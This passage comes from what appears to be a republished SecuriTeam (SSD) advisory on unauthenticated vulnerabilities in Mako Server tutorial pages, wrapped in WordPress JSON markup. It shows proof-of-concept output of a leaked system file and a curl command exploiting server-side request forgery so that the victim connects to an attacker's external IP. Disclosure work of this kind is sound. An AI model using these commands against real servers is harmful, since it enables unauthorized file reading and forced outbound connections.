class=\"crayon-v\">IP<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-9\"><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-10\"><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-11\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">OK<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-12\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mon<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">07<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Aug<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2017<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">22<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">27<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-13\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MakoServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-14\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">octet<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">stream<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-15\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Ranges<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bytes<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-16\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Etag<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">58b4be20<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-17\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Last<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Modified<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Tue<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Feb<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2017<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-18\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">219<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-19\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Alive<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">Alive<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-20\"><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">bit <\/span><span class=\"crayon-e\">app <\/span><span class=\"crayon-i\">support<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-21\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">386Enh<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-22\"><span class=\"crayon-v\">woafont<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">dosapp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fon<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-23\"><span class=\"crayon-v\">EGA80WOA<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">FON<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">EGA80WOA<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">FON<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-24\"><span class=\"crayon-v\">EGA40WOA<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">FON<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">EGA40WOA<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">FON<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-25\"><span class=\"crayon-v\">CGA80WOA<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">FON<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">CGA80WOA<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">FON<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-26\"><span class=\"crayon-v\">CGA40WOA<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">FON<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">CGA40WOA<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">FON<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-27\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-28\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">drivers<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-29\"><span class=\"crayon-v\">wave<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">mmdrv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">dll<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-30\"><span class=\"crayon-v\">timer<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">timer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">drv<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-31\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-32\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">mci<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0046 seconds] -->  <\/p>\n<p><strong>Server Side Request Forgery<\/strong><br \/> Mako web-server tutorial is not sufficiently sanitizing incoming POST requests, when an attacker sends an POST request to the &#8216;<em>rtl\/appmgr\/new-application.lsp<\/em>&#8216; URI, the input will be executed and the server will connect to the attacker&#8217;s machine.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Start Wireshark to see successful connections made from Mako Web Server victim machine.<\/p>\n<p>Initiate requests from another machine using CURL:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59ac7fe2494cd116139830\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> curl -v -X POST http:\/\/VICTIM-IP\/rtl\/appmgr\/new-application.lsp -d io=net -d path=http:\/\/EXTERNAL-IP<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494cd116139830-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494cd116139830-1\"><span class=\"crayon-v\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">X<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">POST <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/VICTIM-IP\/rtl\/appmgr\/new-application.lsp -d io=net -d path=http:\/\/EXTERNAL-IP<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3391\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 03 Sep 2017 06:38:44 +0000<\/strong><\/p>\n<p>\ufeffVulnerabilities Summary The following advisory describe three (3) vulnerabilities found in Mako Server&#8217;s tutorial page. The vulnerabilities found are: Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution Unauthenticated File Disclosure Unauthenticated Server Side Request Forgery As these tutorial may be used as the basis for production code, it is important for users &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3391\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Mako Web-server Tutorials Multiple Unauthenticated Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11591,11851,10757,14357,12136],"class_list":["post-9068","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-file-disclosure","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-server-side-request-forgery","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9068","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9068"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9068\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9068"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9068"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9068"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}